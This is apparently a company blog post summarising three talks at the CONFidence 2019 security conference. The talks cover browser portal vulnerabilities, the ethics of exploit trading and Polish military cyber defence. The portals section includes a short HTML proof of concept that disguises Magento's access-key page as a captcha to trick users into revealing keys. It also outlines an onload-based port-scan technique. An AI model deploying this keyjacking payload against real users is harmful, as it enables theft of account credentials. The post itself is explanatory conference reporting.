Confidence 2019: Portals, Clint Eastwood and polish cyber-force military
On 3rd and 4th of June another edition of CONFidence 2019 took a place at The Aviation Museum of Cracow. Our team member joined the event and left surprisingly contented and amazed.
What is CONFidence?
CONFidence is a cybersecurity conference that connects web security experts and its enthusiasts since 2005. This year’s edition was hosted at Polish Aviation Museum and over 1300 people had joined it. Lectures were split across 3 main tracks and additional community track, conference agenda can be found here. Besides lectures you could attend a treasure hunt - a game in which you had to collect points by finishing special tasks and at the end of the conference team with the highest score won money and tickets for the next year’s edition. If by any chance you would like to compete, you could also join a CTF - a hacking game based on finding hidden flags by exploiting malfunctioning code in many different ways. SQL Injection, cryptography, reverse engineering and miscellaneous. Here is a link to the online CTF teaser.
In total 50 speakers talked about different security topics. We couldn’t attend them all but here is a breakdown of the ones we did. Most of the lectures took 55 minutes.
Topic 1 - Portals
Michał Bentkowski made a short talk about vulnerabilities in portals. Detecting which port is open at any host? Same-Origin Policy bypass? Keyjacking? You have it all.
But actually… what is portal?
How to use portals
As you can see, after activating the portal, URL in the browser is replaced by portal URL and website content is replaced with portal content.
Vulnerability 1 - SOP bypass
Vulnerability 2 - Framing issues (keyjacking)
Another mentioned issue was keyjacking - presented scenario showed possible case of stealing API key by displaying only part of the website in portal and by making user belive that it’s captcha. For example:
This looks like pretty long captcha isn’t it? In fact, code looks like this:
<html> <body> Please enter captcha:<input type="text"/> <portal id="portal" style="width: 400px; height: 863px; border: 1px solid #000; margin-top: -849px;" src="https://marketplace.magento.com/customer/accessKeys/"/> </body> </html>
And is displaying one of the Magento access keys:
Vulnerability 3 - Port Scan
This one is a bit tricky - it uses portal onload event to determine what is a port status of any host. In fact, Michał described few posible cases that can occur when loading content into portal:
- onload fired even times (i.e 2, 4, 6 etc.) - this means that requested port is OPEN
- onload fired odd times (i.e 3, 5, 7 etc.) - this means that requested port is CLOSED
- onload didn’t fire in 1s - this means that requested port can be FILTERED
Topic 2 - Clint Eastwood
Udo Schneider talk was less technical but touched really important ethical issue of vulnerability trading. In modern age of technology you can live pretty decent life by just looking for vulnerabilities in the most known applications and reporting it back to the vendor. Large companies often host a Bug Bounty programs by which you can get paid for finding exploitable features. But what if there is no such a program and you found a bug in software? There are multiple paths you can take.
Common throught that people have when founding exploitable piece of software is “I wonder how much I can get for this at darknet”. Darknet is full of hacking tools and there are planty of places where you could sell it, but is it worth it? It turns out that investing in 0days is very risky - exploit can be detected right after first use or might be patched shortly after purchasing. Besides that, there is something more important to worry about - selling exploits by using Tor network is 100% illegal.
Multiple websites exist that buys exploits on the internet - price range vary, depending on harm level - from hundreds of dollars to millions. Companies that are buying exploits like that are then reselling them to military and largest corporations. This one is ugly because it’s working legally but is making web much less secure place just for sake of profit.
no report to vendor = no fix = software vulnerabilities wide open to attack at any moment
Last but not least is the good path that can be taken when founding vulnerability. You can report it to vendor, and in case they just bluntly say that they won’t fix it, you can contact team dedicated to web security like Google’s Project Zero. Project Zero is team of qualified security experts that looks for vulnerable pieces of software (not only!) and reports it back to vendor and disclosures exploits after 90 days, if vendor does not take action to fix it up to this time, exploit becomes visible to everyone
Topic 3 - Polish cyber-force military
Last of the discussed talks was made by colonel of polish cyber-force military Przemysław Przybylak. He described what steps are taken by military in cyber-space to make Poland more secure country to live in. Of course topic is broad as modern technology brings up new threats every day that needs to be handled. Colonel described in general whole process that needs to be followed strictly to ensure civilians safety. He also mentioned recent Israel bombing, in respond to hackers cyber-attack and more distant in time 2007 cyberattacks on Estonia.
To sum up, we have to say that CONFidence is a conference that is really worth attending when working in IT business. We will definitely join it again in 2020.